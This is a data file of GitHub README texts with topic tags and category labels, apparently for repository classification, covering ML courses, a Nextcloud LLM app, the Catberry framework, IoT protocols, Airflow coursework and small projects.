Dataset fields:
- `names` — string, lengths 1 to 98
- `readmes` — string, lengths 8 to 608k
- `topics` — string, lengths 0 to 442
- `labels` — string, 6 classes
zero-to-mastery-ml
# Zero to Mastery Machine Learning

[![Binder](https://mybinder.org/badge_logo.svg)](https://mybinder.org/v2/gh/mrdbourke/zero-to-mastery-ml/master) [![Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/mrdbourke/zero-to-mastery-ml/blob/master)

Welcome! This repository contains all of the code, notebooks, images and other materials related to the Zero to Mastery Machine Learning course on [Udemy](https://dbourke.link/mlcourse) and [zerotomastery.io](https://dbourke.link/ztmmlcourse).

## Quick links

- Watch the first 10 hours of the course on [YouTube](https://youtu.be/r67sfaiyadi)
- Read the materials of the course in a [beautiful online book](https://dev.mrdbourke.com/zero-to-mastery-ml/)
- Found something wrong with the code? [Leave an issue](https://github.com/mrdbourke/zero-to-mastery-ml/issues)
- Got a question? [Post a discussion](https://github.com/mrdbourke/zero-to-mastery-ml/discussions) — see the [question template](https://github.com/mrdbourke/zero-to-mastery-ml/discussions/48)

## Updates

- **12 October 2023** — Created an online book version of the course materials, see https://dev.mrdbourke.com/zero-to-mastery-ml/ (currently a work in progress).
- **7 Sep 2023 onward** — Working on updating the materials for 2024, see the progress in [#63](https://github.com/mrdbourke/zero-to-mastery-ml/discussions/63).
- **25 Aug 2023** — Updated the Section 3 end-to-end bulldozer regression notebook for Scikit-Learn 1.3 (column order for predictions should match column order for training), see [#62](https://github.com/mrdbourke/zero-to-mastery-ml/discussions/62) for more.

## What this course focuses on

1. Create a framework for working through problems ([6-step machine learning modelling framework](https://github.com/mrdbourke/zero-to-mastery-ml/blob/master/section-1-getting-ready-for-machine-learning/a-6-step-framework-for-approaching-machine-learning-projects.md))
2. Find tools to fit the framework
3. Targeted practice: use tools and framework steps to work on end-to-end machine learning modelling projects

## How this course is structured

- Section 1 — Getting your mind and computer ready for machine learning (concepts, computer setup)
- Section 2 — Tools for machine learning and data science (pandas, NumPy, Matplotlib, Scikit-Learn)
- Section 3 — End-to-end structured data projects (classification and regression)
- Section 4 — Neural networks, deep learning and transfer learning with TensorFlow 2.0
- Section 5 — Communicating and sharing your work

## Student notes

Some students have taken and shared extensive notes on this course, see them below. If you'd like to submit yours, leave a pull request.

1. [Chester's notes](https://github.com/chesterheng/machinelearning-datascience)
2. [Sophia's notes](https://www.rockyourcode.com/tags/udemy-complete-machine-learning-and-data-science-zero-to-mastery/)
machine-learning data-science deep-learning
ai
llm
<!-- SPDX-FileCopyrightText: Marcel Klehr <mklehr@gmx.net>, SPDX-License-Identifier: CC0-1.0 -->

![Logo](https://raw.githubusercontent.com/nextcloud/llm/main/screenshots/logo.png)

# A Large Language Model in Nextcloud

This app ships a TextProcessing provider using a large language model that runs locally on CPU. The models run completely on your machine; no private data leaves your servers.

## Models

- **Llama 2** by Meta — Languages: English — [Llama 2 Community License](https://download.nextcloud.com/server/apps/llm/llama-2-7b-chat-ggml/LICENSE)
- **GPT4All Falcon** by Nomic AI — Languages: English — [Apache License 2.0](https://download.nextcloud.com/server/apps/llm/LICENSE)

## Requirements

- x86 CPU with GNU libc (musl is not supported)
- Python 3.10, including python-venv

### Nextcloud All-in-One

With Nextcloud AIO, this app is not going to work, because AIO uses musl. However, you can use this [community container](https://github.com/nextcloud/all-in-one/tree/main/community-containers/local-ai) as a replacement for this app.

## Ethical AI Rating

**Rating:** Green

Positive:
- The software for training and inference of this model is open source.
- The trained model is freely available, and thus can be run on-premises.
- The training data is freely available, making it possible to check or correct for bias, or optimise the performance and CO2 usage.

Learn more about the Nextcloud Ethical AI Rating [in our blog](https://nextcloud.com/blog/nextcloud-ethical-ai-rating).

## Install

Place this app in `nextcloud/apps/`.

## Building the app

The app can be built by using the provided Makefile by running `make`. This requires the following things to be present:

- make
- which
- tar (for building the archive)
- curl (used if phpunit and composer are not installed to fetch them from the web)
- npm (for building and testing everything JS, only required if a `package.json` is placed inside the `js/` folder)
ai
catberry
# Catberry

[![Build Status](https://travis-ci.org/catberry/catberry.svg?branch=master)](https://travis-ci.org/catberry/catberry) [![codecov.io](http://codecov.io/github/catberry/catberry/coverage.svg?branch=master)](http://codecov.io/github/catberry/catberry?branch=master) [![Gitter](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/catberry/main?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=body_badge)

<p align="center"><img src="https://raw.githubusercontent.com/catberry/catberry/master/docs/images/logo.png" /></p>

## What the cat is that?

Catberry was developed to help create [isomorphic/universal](https://github.com/catberry/catberry/blob/9.0.0/docs/index.md#isomorphicuniversal-applications) web applications. Long story short, isomorphic/universal applications are apps that use the same codebase on both the server and client environments to render what the client would see as a [single-page application](http://en.wikipedia.org/wiki/Single-page_application).

## TL;DR

Install [Catberry CLI](https://www.npmjs.com/package/catberry-cli) using the following command:

```bash
npm install -g catberry-cli
```

Use Catberry CLI to create an empty project with [Handlebars](http://handlebarsjs.com/) support, like this:

```bash
catberry init empty-handlebars
```

Or an example application that works using the GitHub API:

```bash
catberry init example
```

Also, you can get a list of all templates:

```bash
catberry init
```

## Useful links

- [Catberry documentation](https://github.com/catberry/catberry/blob/9.0.0/docs/index.md)
- [Get started guide](https://github.com/catberry/catberry/blob/9.0.0/docs/index.md#get-started)
- [Plugins and tools](https://github.com/catberry/catberry/blob/9.0.0/docs/index.md#plugins-and-tools)
- [Catberry's homepage](https://catberry.github.io/)
- [Todo application](https://github.com/catberry/catberry-todomvc)
- [Example application](https://github.com/catberry/catberry-example)

## Why should I use that?

### Architecture

- The entire architecture of the framework is built using the [Service Locator](https://github.com/catberry/catberry/blob/9.0.0/docs/index.md#service-locator) pattern, which helps to manage module dependencies and create [plugins](https://github.com/catberry/catberry), and [Flux](https://github.com/catberry/catberry/blob/9.0.0/docs/index.md#flux) for the data layer.
- [Cat-components](https://github.com/catberry/catberry/blob/9.0.0/docs/index.md#cat-components) — similar to [web components](http://webcomponents.org/) but organized as directories, can be rendered on the server, and can be published/installed as npm packages.
- Catberry builds a bundle for running the application in a browser as a [single-page application](http://en.wikipedia.org/wiki/Single-page_application).
- [ES2015/ES6 support](https://nodejs.org/en/docs/es6/): native on the server (Node.js) and via [Babel](http://babeljs.io/) for a browser.
- The whole framework's API uses [Promises](https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/Promise).
- The framework itself is an [express](https://github.com/visionmedia/express)/[connect](https://github.com/senchalabs/connect) middleware, which means you can use it with other [middlewares](http://expressjs.com/en/guide/using-middleware.html).

### Rendering

- Fast and efficient [progressive rendering](http://www.phpied.com/progressive-rendering-via-multiple-flushes/) engine based on [node.js streams](http://nodejs.org/api/stream.html#stream_api_for_stream_implementors) on the server.
- Browser rendering does not block the [event loop](https://developer.mozilla.org/en/docs/Web/JavaScript/EventLoop), which means your app's UI will never be frozen.
- [Handlebars](https://github.com/catberry/catberry-handlebars), [Dust](https://github.com/catberry/catberry-dust) and [Pug](https://github.com/catberry/catberry-pug) template engines are [officially supported](https://github.com/catberry/catberry/blob/9.0.0/docs/index.md#template-engines), and you can implement your own provider to support any other.
- Efficient DOM event listening using [event delegation](http://davidwalsh.name/event-delegate).

For more details, please proceed to the [Catberry documentation](https://github.com/catberry/catberry/blob/9.0.0/docs/index.md).

## Typical cat-component example

```javascript
'use strict';

class CoolComponent {
	/**
	 * Creates a new instance of the "CoolComponent" component.
	 * @param {ServiceLocator} locator The service locator for resolving dependencies.
	 */
	constructor(locator) {
		// you can resolve any dependency from the locator
	}

	/**
	 * Gets data for the template. This method is optional.
	 * @returns {Promise<Object>|Object|null|undefined} Data for the template.
	 */
	render() {
		return this.$context.getStoreData();
	}

	/**
	 * Returns event binding settings for the component. This method is optional.
	 * @returns {Promise<Object>|Object|null|undefined} Binding settings.
	 */
	bind() {
		return {
			click: {
				'.clickable': () => window.alert('Ouch!')
			}
		};
	}

	/**
	 * Cleans up everything that has not been set by the .bind() method.
	 * This method is optional.
	 * @returns {Promise|undefined} Promise of nothing.
	 */
	unbind() {
		// nothing to do here, we have used bind properly
	}
}

module.exports = CoolComponent;
```

The component is used as a custom tag:

```html
<cat-cool id="unique-value" cat-store="group/CoolStore"></cat-cool>
```

## Typical store example

```javascript
'use strict';

class CoolStore {
	/**
	 * Creates a new instance of the "CoolStore" store.
	 * @param {ServiceLocator} locator The service locator for resolving dependencies.
	 */
	constructor(locator) {
		/**
		 * Current universal HTTP request for environment-independent requests.
		 * @type {UHR}
		 * @private
		 */
		this._uhr = locator.resolve('uhr');

		/**
		 * Current lifetime of data (in milliseconds) that is returned by this store.
		 * @type {number} Lifetime in milliseconds.
		 */
		this.$lifetime = 60000;
	}

	/**
	 * Loads data from a remote source.
	 * @returns {Promise<Object>|Object|null|undefined} Loaded data.
	 */
	load() {
		// Here you can do any HTTP requests using this._uhr.
		// Please read details here: https://github.com/catberry/catberry-uhr
	}

	/**
	 * Handles an action named "some-action" from any component or store.
	 * @returns {Promise<Object>|Object|null|undefined} Response to the component/store.
	 */
	handleSomeAction() {
		// Here you can call this.$context.changed() if you're sure
		// that the remote data on the server has been changed.
		// You can additionally have many handle methods for other actions.
	}
}

module.exports = CoolStore;
```

## Browser support

While Catberry is capable of rendering pages for any browser on the server, due to the use of certain HTML5 features like the [History API](https://developer.mozilla.org/en-US/docs/Web/Guide/API/DOM/Manipulating_the_browser_history), only partial support of old browsers is possible for the client-side JavaScript application.

The main goal of the Catberry framework is to use the full power of new technologies and provide a user with the best possible experience. In fact, a user gets an HTML page from the server only once, and all the rest of the time the whole page is changing in a browser, receiving only pure data from API service(s) used with the application. Thanks to Catberry's progressive rendering engine, a user receives a page from the server component by component, as fast as each component renders its template, not waiting until the whole page is built.

Catberry supports the 2 last versions of modern browsers and IE 11. It depends on the Babel [babel-preset-env](https://github.com/babel/babel-preset-env) preset, whose config you can override by putting a `.babelrc` file in your project.

## Contributing

There are a lot of ways to contribute to Catberry:

- Give it a star
- Join the [Gitter](https://gitter.im/catberry/main) room and leave feedback or help with answering users' questions
- [Submit a bug or a feature request](https://github.com/catberry/catberry/issues)
- [Submit a PR](https://github.com/catberry/catberry/blob/9.0.0/CONTRIBUTING.md)
- If you like the logo, you might want to buy a Catberry [t-shirt](http://www.redbubble.com/people/catberryjs/works/14439373-catberry-js-framework-logo?p=t-shirt) or a [sticker](http://www.redbubble.com/people/catberryjs/works/14439373-catberry-js-framework-logo?p=sticker)

Denis Rechkunov <denis@rdner.de>
javascript universal isomorphic web framework components progressive-rendering
front_end
awesome-iot-document
# Awesome IoT

[awesome-iot](https://github.com/phodal/awesome-iot)

![IoT structure](http://github.com/phodal/eks/iot-struct/struct.jpg)

English version: [en.md](en.md)

## IoT protocol comparison

| | CoAP | XMPP | RESTful HTTP | MQTT |
|---|---|---|---|---|
| Transport | UDP | TCP | TCP | TCP |
| Messaging | Request/Response, Publish/Subscribe | Request/Response | Request/Response | Publish/Subscribe, Request/Response |
| 2G/3G/4G suitability (1000s of nodes) | Excellent | Excellent | Excellent | Excellent |
| LLN suitability (1000s of nodes) | Excellent | Fair | Fair | Fair |
| Compute resources | 10Ks RAM/Flash | 10Ks RAM/Flash | 10Ks RAM/Flash | 10Ks RAM/Flash |
| Success stories | Utility field area networks | Remote management of consumer white goods | Smart Energy Profile 2 (premise energy management, home services) | Extending enterprise messaging into IoT applications |

## Protocols

- **XMPP** — XML-based, extensible messaging and presence protocol.
- **MQTT** (Message Queuing Telemetry Transport) — lightweight publish/subscribe messaging protocol originated at IBM. ![MQTT](images/mqtt.png)
- **CoAP** (Constrained Application Protocol) — RESTful application protocol for constrained M2M devices; unlike HTTP/REST over TCP, CoAP runs over UDP with a compact 4-byte base header. ![CoAP](images/coap.jpg)
- **Thread** — IPv6-based mesh networking protocol built on IEEE 802.15.4. ![Thread](images/thread.jpg)
- **Z-Wave** — sub-GHz radio (908.42 MHz US / 868.42 MHz EU), FSK (BFSK/GFSK) modulation, 9.6 kbps data rate, roughly 30 m indoor to 100 m open-air range.
- **ZigBee** — low-power mesh networking standard based on IEEE 802.15.4.
- **WebSocket** — full-duplex protocol introduced with HTML5.
- **SOAP** — XML-based web service protocol.
- **6LoWPAN** — IETF standard for IPv6 over low-power wireless personal area networks.
- **BACnet** / **LonWorks** — building automation protocols.
- **UDP** / **uIP** — uIP is a minimal TCP/IP stack by Adam Dunkels, written in C, implementing IP, ICMP, UDP, TCP and ARP.
- **DTLS** (Datagram Transport Layer Security) — TLS adapted to UDP datagrams; DTLS 1.0 corresponds to TLS 1.1 and DTLS 1.2 to TLS 1.2.
- **NFC** — short-range RFID-derived technology operating at 13.56 MHz.
- **Wi-Fi** — IEEE 802.11 WLAN.

## Platforms

- [Yeelink](http://www.yeelink.net/)
- [SiteWhere](http://www.sitewhere.org/) — "the open platform for the Internet of Things"; stores data in MongoDB or Apache HBase.
- [DeviceHive](http://www.devicehive.com/) — web-based M2M framework.
- [DeviceHub.net](http://devicehub.net/)
- [IoT Toolkit](http://iot-toolkit.com/)
- Mango
- Nimbits — runs on EC2/J2EE; clients include Arduino, JavaScript/HTML, and the nimbits.io Java library.
- OpenRemote — Java-based.
- ThingSpeak — integrates with Arduino, ioBridge RealTime.io, Electric Imp and MATLAB.

## Real-time operating systems (RTOS)

- **Contiki** — OS for constrained devices with CoAP, TCP/IP, RPL, 6LoWPAN and Rime support; written in C and able to run in a few kilobytes of memory.
- **lwIP** (Light Weight IP) — full TCP/IP stack needing only tens of KB of RAM and about 40 KB of ROM; provides its own API.
- **FreeRTOS** — RTOS with a very small RAM footprint, often compared with uC/OS-II, embOS and Salvo; version 8.0.0 at the time of writing.
- **mbed OS** — ![mbed OS](images/mbedos.png) targets ARM Cortex-M; connectivity includes BLE, cellular (2G/3G/CDMA), Wi-Fi, ZigBee/802.15.4, Thread and 6LoWPAN; security via TLS/DTLS; protocols CoAP, HTTP, MQTT and OMA LWM2M; runs in 32–64 KB RAM and 256 KB flash. mbed OS is an operating system for IoT devices and is especially well suited to run in energy-constrained environments. The OS includes the connectivity, security, and device management functionalities required in every IoT device:
  - Connectivity protocol stack support for Bluetooth Low Energy, cellular, Ethernet, Thread, Wi-Fi, ZigBee IP, ZigBee NAN, 6LoWPAN
  - Automation of power management
  - Software asset protection and secure firmware updates for device security management
  - Supports a wide range of ARM Cortex-M based hardware platforms from major MCU vendors
  - Support for the OMA Lightweight M2M protocol for device management
  - Updatable and secure devices at the edge, capable of additional processing and functionality
  - Banking-class end-to-end IP security across the communication channels through TLS/DTLS
  - Future-proof designs by supporting all the key open standards for connectivity and device management
- **embOS** — RTOS with a minimal footprint, on the order of 1 KB ROM and tens of bytes of RAM.
- **Salvo** — Salvo is the first real-time operating system (RTOS) designed expressly for very-low-cost embedded systems with severely limited program and data memory. With Salvo, you can quickly create low-cost, smart and sophisticated embedded products. Pumpkin has currently certified Salvo for use with uC/OS-II.
- **uC/OS-II** (Micro-Controller Operating System Two) — ROMable, preemptive RTOS written in ANSI C; ported to many CPU and DSP architectures, from 8- to 64-bit; its development dates back to 1992.
- **TinyOS** — component-based OS from UC Berkeley; CoAP support via [TinyCoAP](http://tinyos.stanford.edu/tinyos-wiki/index.php/CoAP).
- **MQX** — Freescale MQX RTOS: a full-featured, complimentary real-time operating system including the MQX kernel, TCP/IP stack (RTCS), embedded MS-DOS file system (MFS), USB host/device stack and more. The MQX multitasking kernel provides pre-emptive scheduling, fast interrupt response, and extensive inter-process communication and synchronization facilities. MQX RTOS includes its own peripheral drivers.
- **QNX** — POSIX-compliant microkernel OS by QSSL (QNX Software Systems Ltd.); runs on Intel x86/Pentium, PowerPC and MIPS CPUs.
- **OpenWrt** — Linux distribution for embedded devices such as routers; related projects include DD-WRT and Tomato.
- **RIOT** — [riot-os.org](http://riot-os.org/); grew out of the FeuerWhere project and was released in 2013; supports MSP430, ARM7, Cortex-M0/M3/M4 and x86.

## Libraries

### CoAP

- **libcoap** (C) — [sourceforge.net/projects/libcoap](http://sourceforge.net/projects/libcoap/) — lightweight application protocol for devices that are constrained in their resources, such as computing power, RF range, memory, bandwidth, or network packet sizes. This protocol, CoAP, is developed in the IETF working group [CoRE](http://6lowapp.net).
- **jCoAP** (Java) — [code.google.com/p/jcoap](https://code.google.com/p/jcoap/) — a Java library implementing the Constrained Application Protocol (CoAP).
- **node-coap** (JavaScript/Node.js) — [github.com/mcollina/node-coap](https://github.com/mcollina/node-coap) — a client and server library for CoAP modelled after the `http` module.
- **coap** (Python) — [github.com/openwsn-berkeley/coap](https://github.com/openwsn-berkeley/coap) — a CoAP Python library; this package implements the Constrained Application Protocol (CoAP) developed by the IETF CoRE working group.
- **Californium (Cf)** (Java) — [github.com/mkovatsc/californium](https://github.com/mkovatsc/californium) — an open-source implementation of the Constrained Application Protocol (CoAP). It is written in Java and targets unconstrained environments such as back-end service infrastructures (e.g. proxies, resource directories, or management services) and less constrained environments such as embedded devices running Linux (e.g. smart home controllers or vehicle sensors). Californium (Cf) has been running code for the IETF standardization of CoAP, and was recently reimplemented to straighten changed design decisions but also to improve its performance with a focus on scalability. The new implementation was successfully tested at the ETSI CoAP#3 and OMA LWM2M Plugtests in November 2013.

### REST

- **cJSON** (C) — [sourceforge.net/projects/cjson](http://sourceforge.net/projects/cjson/) — lightweight JSON (JavaScript Object Notation) parser written in C.
- **curl** (C) — [curl.haxx.se](http://curl.haxx.se/) — URL transfer tool and library for Unix/Linux, DOS, Win32 and Win64.

### MQTT

- **HiveMQ** (Java) — [hivemq.com](http://www.hivemq.com/) — MQTT broker for M2M applications.

## Books

- *Learning Internet of Things*, Peter Waher, 2015-02 ([book/ebook](https://www.packtpub.com/application-development/learning-internet-things))
- http://designiot.phodal.com — by Phodal, 2014-11
- *RESTful Web APIs*, Leonard Richardson and Mike Amundsen, 2014-06
- Arduino books: Michael McRoberts, 2013-03; *Arduino Cookbook*, Michael Margolis, 2011-04
- *Raspberry Pi*, Eben Upton, 2013-08

## License

[![CC BY-NC 4.0](https://i.creativecommons.org/l/by-nc/4.0/88x31.png)](http://creativecommons.org/licenses/by-nc/4.0/) [Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)](http://creativecommons.org/licenses/by-nc/4.0/)

© 2014 [Phodal Huang](http://www.phodal.com)
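To make the "lightweight" claim about CoAP concrete, here is a minimal sketch of its fixed 4-byte message header as defined in RFC 7252. The function name and example values are mine, not from any of the libraries listed above:

```python
def coap_header(msg_type, code, message_id, token=b""):
    """Encode the fixed 4-byte CoAP header (RFC 7252), followed by the token.

    Byte 0: version (2 bits, always 1) | type (2 bits: 0=CON, 1=NON,
            2=ACK, 3=RST) | token length (4 bits).
    Byte 1: code (class.detail; e.g. 0.01 = GET -> 0x01).
    Bytes 2-3: message ID, big-endian.
    """
    first = (1 << 6) | ((msg_type & 0x3) << 4) | (len(token) & 0xF)
    return bytes([first, code & 0xFF, (message_id >> 8) & 0xFF, message_id & 0xFF]) + token

# A confirmable (CON) GET request with message ID 0x1234 and no token:
header = coap_header(0, 0x01, 0x1234)  # -> b'\x40\x01\x12\x34'
```

Four bytes of fixed overhead (versus HTTP's text headers) is a large part of why CoAP fits the "10Ks RAM/Flash" budget in the comparison table.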
server
sightseq
# sightseq

Now let's go sight-seeing: by vision ("sight") and seq-uence (language, multimodal) around the deep learning world.

## What's new

- **July 30, 2019** — Added Faster R-CNN models. I also renamed this repo from image-captioning to sightseq. This is the last time I rename this repo, I promise.
- **June 11, 2019** — I rewrote the text recognition part based on [fairseq](https://github.com/pytorch/fairseq). The stable version lives in the branch [crnn](https://github.com/zhiqwang/image-captioning/tree/crnn), which provides pre-trained model checkpoints. The current branch is a work in progress. Suggestions and cooperation on the fairseq text recognition project are very welcome.

## Features

sightseq provides reference implementations of various deep learning tasks, including:

- **Text recognition**: Shi et al. (2015), [CRNN: An End-to-End Trainable Neural Network for Image-based Sequence Recognition and Its Application to Scene Text Recognition](https://arxiv.org/abs/1507.05717)
- **Object detection** (new): Ren et al. (2015), [Faster R-CNN: Towards Real-Time Object Detection with Region Proposal Networks](https://arxiv.org/abs/1506.01497)

Additionally:

- All features of fairseq
- Flexible configuration of convolution and recurrent layers in CRNN
- Positional encoding of images

## General requirements and installation

- [PyTorch](http://pytorch.org/) — there is a [bug](https://github.com/pytorch/pytorch/pull/21244) in [nn.CTCLoss](https://pytorch.org/docs/master/nn.html#ctcloss) which is solved in the nightly version
- Python version 3.5+
- [fairseq](https://github.com/pytorch/fairseq) version 0.7.1
- [torchvision](https://github.com/pytorch/vision) version 0.3.0
- For training new models, you'll also need an NVIDIA GPU and [NCCL](https://github.com/nvidia/nccl)

## Pre-trained models and examples

- [Text recognition examples](#text-recognition)
- [Object detection examples](#object-detection)

## License

sightseq is MIT-licensed. The license applies to the pre-trained models as well.
crnn ctc scene-texts pytorch ocr attention transformer image-captioning text-recognition mobilenet densenet object-detection faster-rcnn
ai
PuppyGo
# PuppyGo

Vision-language model and large language model powered embodied agent.

<div>
<p>
<img src="src/voxposer.gif" width="430">
<img src="src/puppygo.jpg" width="320">
</p>
</div>

## Here's what I did

"Language Models as Zero-Shot Planners: Extracting Actionable Knowledge for Embodied Agents" extracts affordances and constraints from large language models and vision-language models to compose 3D value maps, which are used by motion planners to zero-shot synthesize trajectories for everyday manipulation tasks. This is combined with an end-to-end large-model training framework like UniAD.

## This package is sponsorware

[![Sponsor](https://img.shields.io/static/v1?label=Sponsor&message=%E2%9D%A4&logo=GitHub&color=%23fe8e86)](https://github.com/sponsors/Charmve?frequency=one-time&sponsor=Charmve)

This repo was only available to my sponsors on [GitHub Sponsors](https://github.com/sponsors/Charmve?frequency=one-time&sponsor=Charmve) until I reached 15 sponsors. Learn more about sponsorware at [github.com/sponsorware/docs](https://github.com/sponsorware/docs).

![image](https://github.com/Charmve/PuppyGo/assets/29084184/3577e267-53a0-4904-909f-6733995e892e)

<br>

## Execution under disturbances

Because the language model output stays the same throughout the task, we can cache its output and re-evaluate the generated code using closed-loop visual feedback, which enables fast replanning using MPC. This makes VoxPoser robust to online disturbances.

<div class="columns">
<div class="column has-text-centered">
<video id="dist1" controls muted autoplay loop width="99%">
<source src="src/sort_trash_to_tray_dist.mp4" type="video/mp4">
</video>
<p style="text-align: center">Sort the paper trash into the blue tray.</p>
</div>
<div class="column has-text-centered">
<video id="dist2" controls muted autoplay loop width="99%">
<source src="src/close_top_drawer_dist.mp4" type="video/mp4">
</video>
<p style="text-align: center">Close the top drawer.</p>
</div>
</div>
chatgpt deepmind embodied-agent palm2 rt-2 voxposer
ai
tpf-pythondataapp-ITBA
# Building a data system with Airflow

The goal of this practice is to build a system that logs the daily price of different stocks.

## Instructions

1. Set up Airflow using the official docker-compose YAML file, which can be obtained [here](https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html#docker-compose-yaml). Before starting, we suggest changing one line in the docker-compose file to disable the automatic loading of examples, to avoid UI clutter: change `AIRFLOW__CORE__LOAD_EXAMPLES: 'true'` to `AIRFLOW__CORE__LOAD_EXAMPLES: 'false'`. By default this setup creates a `dags` directory on the host, from which Airflow obtains the DAG definitions. After the initial setup, an Airflow instance should be reachable at http://localhost:8080/home. The default username and password are `airflow`/`airflow`.
2. Create another database in the Postgres instance used by Airflow to store the stocks data.
3. Develop the data model to store the daily stock data (symbol, date, open, high, low, close) using SQLAlchemy's declarative base. Then create the tables in the DB.
4. Create a Python class, similar to the `SqliteClient` of the practical Airflow coursework, in order to connect with the Postgres DB. You should implement the same methods present in the `SqliteClient`. **Bonus:** try to write a parent/base DB API class and make the SQLite and Postgres clients inherit from it.
5. Develop a DAG that obtains the price information of Google (GOOG), Microsoft (MSFT) and Amazon (AMZN), and then inserts the data in the database using the Python class developed in the previous point. For this we suggest using the following API: https://www.alphavantage.co/. The Python files that define the DAGs should be placed in the `dags` directory previously mentioned.
6. Add another task, depending on the first one, that fetches the last week of data from the database and produces a plot of the value of each stock during said time period.
7. Add two unit tests runnable with [pytest](https://docs.pytest.org/) that can be run from the command line: one that tests the extraction (this refers to the formatting that takes place after the data is fetched from the API and before it is inserted in the DB), and another for the aggregation of the values used for plotting, after they are extracted from the DB.
8. Implement a CI step using [GitHub Actions](https://docs.github.com/en/actions) to run the unit tests with pytest each time a commit is pushed to a branch in a PR. In case of failure, the result should be visible in GitHub's merge request UI.

## Extras

Using the suggested docker-compose setup, you can access the database (using `airflow` as both username and password) in the following way:

```
$ sudo docker-compose exec airflow-webserver psql -h postgres
Password for user airflow:
psql (11.13 (Debian 11.13-0+deb10u1), server 13.4 (Debian 13.4-4.pgdg110+1))
WARNING: psql major version 11, server major version 13.
         Some psql features might not work.
Type "help" for help.

airflow=#
```

In the same way, you can open a shell to work inside the Docker containers using:

```
$ sudo docker-compose exec airflow-webserver /bin/bash
```

This can be useful when creating the tables that will hold the data. When connecting to the DB from inside the container, you can use the default value of the `AIRFLOW__CORE__SQL_ALCHEMY_CONN` variable defined in the compose file.

## Bonus points

If you want to go the extra mile, you can do the following:

- Add the configs for [pylint](https://pylint.org/) and [black](https://black.readthedocs.io/en/stable/).
- Implement a CI step using [GitHub Actions](https://docs.github.com/en/actions) to run pylint each time a commit is pushed to a branch in a PR.
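Steps 3 and 4 above ask for a data model and a thin DB client class. A minimal sketch of the client idea, using the stdlib `sqlite3` in place of Postgres for illustration (the class and method names here are mine, not the coursework's actual `SqliteClient` interface):

```python
import sqlite3


class SqliteClient:
    """Minimal DB client sketch: connect once, expose execute/fetch helpers."""

    def __init__(self, path=":memory:"):
        self.conn = sqlite3.connect(path)

    def execute(self, sql, params=()):
        cur = self.conn.execute(sql, params)
        self.conn.commit()
        return cur

    def fetchall(self, sql, params=()):
        return self.conn.execute(sql, params).fetchall()


client = SqliteClient()
# The (symbol, date, open, high, low, close) model from step 3, as plain SQL:
client.execute(
    "CREATE TABLE stock_price ("
    " symbol TEXT, date TEXT, open REAL, high REAL, low REAL, close REAL,"
    " PRIMARY KEY (symbol, date))"
)
client.execute(
    "INSERT INTO stock_price VALUES (?, ?, ?, ?, ?, ?)",
    ("GOOG", "2023-01-02", 98.0, 101.5, 97.2, 100.9),
)
rows = client.fetchall("SELECT symbol, close FROM stock_price")
```

The Postgres client from step 4 would keep the same method surface but build its connection from the `AIRFLOW__CORE__SQL_ALCHEMY_CONN`-style URL, which is what makes the bonus base-class refactor natural.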
airflow python github-actions
cloud
ThingsBoard
# ThingsBoard

Student: Lucas Dutra Ferreira do Nascimento — registration 17/0050939

## Project requirements

- GCC
- VSCode
- PlatformIO (VSCode extension)
- ESP32 (board used for development)
- DHT11 (humidity and temperature sensor)
- SW-520D (tilt sensor)

## Development environment

The project was developed on macOS Monterey 12.6 (M1).

## How to run the project

The steps below assume that all project requirements have been met.

1. Connect the ESP32 board to the computer.
2. Open the project directory in the VSCode editor.
3. Using the PlatformIO extension tools, compile the project code. ![compile](img/compile.png)
4. Using the PlatformIO extension tools, upload the code to the board. It is necessary to press the boot button to activate download mode. ![upload](img/upload.png)
5. Now just disconnect and reconnect the board to the computer for the flashed firmware to take effect.
6. Access the [ThingsBoard dashboard](http://164.41.98.25:443/dashboards/22d1c780-379d-11ed-be92-e3a443145aec) for actions related to the board.

## Demo video

https://youtu.be/kcqduccqccu
c esp32 mqtt platformio
os
sentimentalizer
# Sentimentalizer

**Archived**: It is 2023, you should be using something else for sentiment analysis. Maybe [this](https://huggingface.co/blog/sentiment-analysis-python) is something you can use.

Inspired by [sentan](https://github.com/martinrue/sentan) and [node-sentiment](https://github.com/martinrue/node-sentiment).

This gem can be used separately or integrated with a Rails app.

## Instructions for Rails use

1. Install the gem using bundler: `gem 'sentimentalizer'`
2. Run `rails g sentimentalizer`. This will generate an initializer file with an `after_initialize` hook for Rails. It's basically training a model to use in the application. It will run every time you start the server or run any rake commands. Would love some input on this.
3. Now you can run the following (after `require 'sentimentalizer'`):

```ruby
Sentimentalizer.analyze('message or tweet or status')
# or for JSON output
Sentimentalizer.analyze('message or tweet or status', true)
```

You will get output like this:

```ruby
Sentimentalizer.analyze('i am so happy')
=> { text: 'i am so happy', probability: 0.937, sentiment: ... }

Sentimentalizer.analyze('i am so happy', true)
=> { "text": "i am so happy", "probability": 0.937, "sentiment": ... }
```

## Instructions for vanilla Ruby use

1. Install the gem using bundler: `gem 'sentimentalizer'`
2. Either fire up irb, or require it in your project with `require 'sentimentalizer'`.
3. Now you need to train the engine in order to use it:

```ruby
require 'sentimentalizer'
Sentimentalizer.setup
```

Or wrap it in a class, so setup can be automatic:

```ruby
class Analyzer
  def initialize
    Sentimentalizer.setup
  end

  def process(phrase)
    Sentimentalizer.analyze(phrase)
  end
end
```

Or for JSON output: `Sentimentalizer.analyze('message or tweet or status', true)`.

And now you will get output like this:

```ruby
analyzer = Analyzer.new
analyzer.process('i am so happy')
=> { text: 'i am so happy', probability: 0.937, sentiment: ... }

analyzer.process('i am so happy', true)
=> { "text": "i am so happy", "probability": 0.937, "sentiment": ... }
```

## Contributing to sentimentalizer

- Check out the latest master to make sure the feature hasn't been implemented or the bug hasn't been fixed yet.
- Check out the issue tracker to make sure someone hasn't already requested it and/or contributed it.
- Fork the project.
- Start a feature/bugfix branch.
- Commit and push until you are happy with your contribution.
- Make sure to add tests for it. This is important so I don't break it in a future version unintentionally.
- Please try not to mess with the Rakefile, version, or history. If you want to have your own version, or it is otherwise necessary, that is fine, but please isolate it to its own commit so I can cherry-pick around it.

## Copyright

Copyright (c) 2018 malavbhavsar. See LICENSE.txt for further details.
rails ruby machine-learning sentiment-analysis naive-bayes
ai
Geobuddy
# Geobuddy

Contributors: Ling Ye, Brian Suitt, Yi Sui.

See all the technical details in the tech report.
os
human-eval
# HumanEval: Hand-Written Evaluation Set

